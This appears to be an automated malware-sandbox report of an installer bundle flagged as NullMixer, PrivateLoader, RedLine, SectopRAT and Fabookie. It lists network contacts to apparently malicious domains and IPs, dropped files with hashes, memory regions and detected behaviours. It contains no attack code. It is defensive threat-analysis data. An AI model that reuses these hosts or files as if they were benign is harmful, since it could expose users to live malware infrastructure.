| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| FR | 51.178.186.149:80 | | tcp |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:60748 | | tcp |
| N/A | 127.0.0.1:60750 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 99.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe
| MD5 | a979670adefae9ab376382f3229f3f28 |
| SHA1 | 5b5b75a789e46a2f8ac02fba3d895fa968387c9b |
| SHA256 | a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040 |
| SHA512 | f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/2684-46-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/2684-60-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3752-61-0x0000000073BCE000-0x0000000073BCF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe
| MD5 | dd2fdd69b9db1cf5764dcfd429a1cf5e |
| SHA1 | c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8 |
| SHA256 | d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe |
| SHA512 | c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d |
memory/4612-73-0x0000000004C60000-0x0000000005288000-memory.dmp
memory/4612-72-0x0000000073BC0000-0x0000000074370000-memory.dmp
memory/4612-71-0x0000000004590000-0x00000000045C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
| MD5 | 1cc8a64b178076dca421fedc3a248a56 |
| SHA1 | db8ed444965577dfb6db4f92ddd8d96a157ddea5 |
| SHA256 | 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345 |
| SHA512 | c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe
| MD5 | e9133ca1a95483a3331d0f336685302d |
| SHA1 | 48c1348e20b26be8227ed63a1db0f13716f1b8e3 |
| SHA256 | 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b |
| SHA512 | 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57 |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe
| MD5 | 854ea0bc0602795b95da3be8257c530f |
| SHA1 | f243a71edc902ed91d0f990630a73d0d01828c73 |
| SHA256 | c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e |
| SHA512 | 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe
| MD5 | 0e05650d436fd4d92775cd4f65973870 |
| SHA1 | 4d13aaa6b18630d0c89400cee5933130f03bd762 |
| SHA256 | 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16 |
| SHA512 | 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08 |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe
| MD5 | 29c9683aa48f1e3a29168f6b0ff3be04 |
| SHA1 | f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f |
| SHA256 | e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901 |
| SHA512 | a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891 |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe
| MD5 | 10e13cc7b41d162ab578256f27d297b1 |
| SHA1 | 1d938b7e6e99951d9b8139f078483539120021e6 |
| SHA256 | 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9 |
| SHA512 | 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
memory/2684-59-0x0000000064941000-0x000000006494F000-memory.dmp
memory/2684-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2684-57-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2684-56-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2684-55-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2684-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2684-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2684-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2684-51-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2684-50-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2684-49-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2684-47-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/4244-83-0x00000000002B0000-0x00000000002CA000-memory.dmp
memory/4612-87-0x00000000052D0000-0x00000000052F2000-memory.dmp
memory/8-90-0x0000000000710000-0x0000000000778000-memory.dmp
memory/4612-100-0x0000000005550000-0x00000000058A4000-memory.dmp
memory/4612-89-0x00000000054E0000-0x0000000005546000-memory.dmp
memory/8-111-0x0000000002A00000-0x0000000002A1E000-memory.dmp
memory/8-106-0x0000000005070000-0x00000000050E6000-memory.dmp
memory/4612-88-0x0000000005470000-0x00000000054D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_htflkwkw.ify.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4244-86-0x0000000002320000-0x0000000002326000-memory.dmp
memory/8-112-0x0000000005810000-0x0000000005DB4000-memory.dmp
memory/3752-113-0x00000000065D0000-0x00000000065EE000-memory.dmp
memory/3752-114-0x0000000006AB0000-0x0000000006AFC000-memory.dmp
memory/2684-122-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3076-126-0x0000000000400000-0x0000000000883000-memory.dmp
memory/2684-125-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2684-124-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2684-123-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2684-120-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2684-116-0x0000000000400000-0x000000000051B000-memory.dmp
memory/3752-129-0x0000000006BA0000-0x0000000006BD2000-memory.dmp
memory/3752-130-0x000000006E870000-0x000000006E8BC000-memory.dmp
memory/3752-140-0x0000000006B80000-0x0000000006B9E000-memory.dmp
memory/3752-144-0x00000000077C0000-0x0000000007863000-memory.dmp
memory/4612-145-0x000000006E870000-0x000000006E8BC000-memory.dmp
memory/4612-159-0x0000000006BD0000-0x0000000006BEA000-memory.dmp
memory/3752-161-0x0000000007F40000-0x00000000085BA000-memory.dmp
memory/4612-163-0x0000000006F10000-0x0000000006F1A000-memory.dmp
memory/4612-164-0x0000000007100000-0x0000000007196000-memory.dmp
memory/4612-165-0x0000000007090000-0x00000000070A1000-memory.dmp
memory/4612-166-0x00000000070C0000-0x00000000070CE000-memory.dmp
memory/3752-167-0x0000000007B40000-0x0000000007B54000-memory.dmp
memory/3752-188-0x0000000007C30000-0x0000000007C4A000-memory.dmp
memory/3752-189-0x0000000007C20000-0x0000000007C28000-memory.dmp
memory/4612-195-0x0000000073BC0000-0x0000000074370000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Temp\IiKZCUV.MQ
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
C:\Users\Admin\AppData\Local\Temp\6h87pfZ.4
| MD5 | 243a3d5a63c4d0f3a18a3d340f50ed8d |
| SHA1 | 4b5d7d91fdc7666d131ef4ed7524bdc1b024a009 |
| SHA256 | 4da1a700d1dd30fa025a3682aa490680099d508a0b64fbdf8bac2f92914628a1 |
| SHA512 | 64cd601f218c7ace06dd62ad41faf58d829b77f221fa444d2e347f52fa03210584f75448416e4910a0bb2058aafb8aaadcc9e9ea5c353cb29c352c23c6532ab1 |
C:\Users\Admin\AppData\Local\Temp\jB946RB.I7A
| MD5 | d4c89c7cabd256ccedd701e27b3fc31a |
| SHA1 | c01e95b983215b9a08c807084185dbd17ccd32aa |
| SHA256 | e7fe376512c6ba9b615d492961ef38a27b14d192b7c9751b75d9004370b5266c |
| SHA512 | 1d3d59c17368f3e264241fc5100971b74487d0bdc0e7902081a332314fdc59e07475f1aaeed17cd2bc1f64c59378ebe1b76e83ea046351d6691c647a60cbb421 |
C:\Users\Admin\AppData\Local\Temp\r6f7sE.I
| MD5 | bd3523387b577979a0d86ff911f97f8b |
| SHA1 | 1f90298142a27ec55118317ee63609664bcecb45 |
| SHA256 | a7e608f98f06260044d545f7279b8f859f7b7af98ac2b2b79a3cd7ac3b2dac36 |
| SHA512 | b37cb8daddb526312f6be439a3cb87fe62b69d44866df708f10eb148455f09f90b0dcee4360c1ae332d3936357fd4c474920aebec5aa8ddb005b617356c3d286 |
C:\Users\Admin\AppData\Local\Temp\XHnbBPN.0kM
| MD5 | 008132f08399ae8927e41d1ea88ffe74 |
| SHA1 | c7d2551b905d578779533418e7a394fd94f17903 |
| SHA256 | 439a6346ae58af4ce7d863d18b70b98e5628ea0f81cd740dd3b886fbe3a7246a |
| SHA512 | 36a05a28325fc92017f6c44e7a6d88abe15a935aef61aa0047926efdb1ec8d3359fdb9e02d4602d4738ad25503e0dbe66f26d45bbea7f10d219aaa015c210d4e |
C:\Users\Admin\AppData\Local\Temp\BtDIj1.fYl
| MD5 | d17564f93bb4a4cf11c46726ea1fe74b |
| SHA1 | 84cbff97ff148296bf36898dcf640ad18eb317c9 |
| SHA256 | 96a4ccf3bc2092c2198cad0beb6a6fdc26db7f59bb82bf4e476bbac6fc783ce0 |
| SHA512 | f327cac0e017ebdaa87e1a8ed40d3abfa5a7614250a9759d6ae62f0f7149aa8ee4a26bb74854ef3860ae8911d87b55803d1f4c0fd58d19507ac4b91eebbb48ff |
C:\Users\Admin\AppData\Local\Temp\Q_tW.pL
| MD5 | 40ba2d6fcce0565f8d90055a8fb9975b |
| SHA1 | c7529fea938658e19d238200af795533cba13c5c |
| SHA256 | df403d434bdcc3b3604349310c62ca68718f1388a3d9c6155e026ff685b555b6 |
| SHA512 | fd8dd7936d96952acaba5f96ff6116b17bc79f770b324945ba966b00e6b3ff6c9f6388bd402d3e5ad40d42a37123416fe904a7d15c749585593caecfcf46b816 |
memory/1760-222-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1760-225-0x0000000004F70000-0x000000000507A000-memory.dmp
memory/1760-227-0x0000000004EE0000-0x0000000004F2C000-memory.dmp
memory/1760-226-0x0000000004EA0000-0x0000000004EDC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat062000ca9aa6.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/1760-224-0x0000000004D00000-0x0000000004D12000-memory.dmp
memory/1760-223-0x0000000005300000-0x0000000005918000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\U56d.r
| MD5 | 4d5164bd007e1af1a6b436b89fc98329 |
| SHA1 | 808e5215729cff6daf37bfcac7af29e8959a7c26 |
| SHA256 | eaeb79cf3f2e99906d1b5f89b92fcb5555117f0a527247b5becbc78cf65cc434 |
| SHA512 | f977ced0b42db76bab7d79d35f6dad56bdbbde527ccde0f8810838d5364b89223f9ec673915ac9b0f595bad7251d3d17d1be479c8ed5bf56c19aac8470a6b668 |
C:\Users\Admin\AppData\Local\Temp\FdKD47Ef.i1
| MD5 | 22e51c0e8d96e09cf8571ef2a4f91cfb |
| SHA1 | 46f3a3ad48c540816c110c67b8eab824ebeec8c1 |
| SHA256 | e296a4b63a6561115cab7809fb27eb85d3db864d59ecbce82b784d52572a83f1 |
| SHA512 | 40e328acf47cbf6754b29b856e6a17e6cc15cf9b11b9e58b267fb26b14d598e71cefa266b43f552d51d81dca712e5024a77ca09fb1535ae54cb8586e8b5ccc7f |
C:\Users\Admin\AppData\Local\Temp\ykifDQA.1
| MD5 | 7b25b2318e896fa8f9a99f635c146c9b |
| SHA1 | 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2 |
| SHA256 | 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89 |
| SHA512 | a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6 |
C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0
| MD5 | 6c83f0423cd52d999b9ad47b78ba0c6a |
| SHA1 | 1f32cbf5fdaca123d32012cbc8cb4165e1474a04 |
| SHA256 | 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae |
| SHA512 | e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec |
C:\Users\Admin\AppData\Local\Temp\gUVIl5.SCh
| MD5 | 973c9cf42285ae79a7a0766a1e70def4 |
| SHA1 | 4ab15952cbc69555102f42e290ae87d1d778c418 |
| SHA256 | 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968 |
| SHA512 | 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85 |
C:\Users\Admin\AppData\Local\Temp\20L2vNO.2
| MD5 | 4bf3493517977a637789c23464a58e06 |
| SHA1 | 519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4 |
| SHA256 | ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831 |
| SHA512 | 4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501 |
memory/1500-228-0x0000000000400000-0x000000000089B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7ab31342d1577fbf35832794ed7ab952 |
| SHA1 | 85c2d3f12c860791ee4aac97d54d8254f66b5c40 |
| SHA256 | 1d38ec9d273d2c68ffd4557d20c4410cfaf1888842f865e26056f17acf459c86 |
| SHA512 | a8bdf994a2faff81d11fe8292fbb34300513ccc18f02ba5963b788f8ceb42eee0aca5902bb5d2babcea43f9e4d93cc97ff4725be4476a80be0f1f0caffdf6c56 |
memory/2420-232-0x0000000003740000-0x00000000037E5000-memory.dmp
memory/2420-236-0x00000000037F0000-0x0000000003882000-memory.dmp
memory/2420-233-0x00000000037F0000-0x0000000003882000-memory.dmp
memory/3380-237-0x0000000000400000-0x000000000054C000-memory.dmp
memory/2420-238-0x0000000000400000-0x0000000000602000-memory.dmp
memory/3380-239-0x0000000003140000-0x00000000031E5000-memory.dmp
memory/3380-243-0x00000000031F0000-0x0000000003282000-memory.dmp
memory/3380-240-0x00000000031F0000-0x0000000003282000-memory.dmp
memory/3144-244-0x0000000000400000-0x000000000054C000-memory.dmp
memory/3144-253-0x00000000036D0000-0x0000000003775000-memory.dmp
memory/3144-257-0x0000000003780000-0x0000000003812000-memory.dmp
memory/3144-254-0x0000000003780000-0x0000000003812000-memory.dmp
memory/2420-259-0x00000000037F0000-0x0000000003882000-memory.dmp
memory/3380-267-0x00000000031F0000-0x0000000003282000-memory.dmp
memory/1476-270-0x00000000022A0000-0x00000000023EC000-memory.dmp
memory/1476-273-0x00000000022A0000-0x00000000023EC000-memory.dmp
memory/3144-275-0x0000000003780000-0x0000000003812000-memory.dmp
memory/1476-279-0x0000000002BD0000-0x0000000002C75000-memory.dmp
memory/1476-280-0x0000000002C80000-0x0000000002D12000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
77s
Max time network
150s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
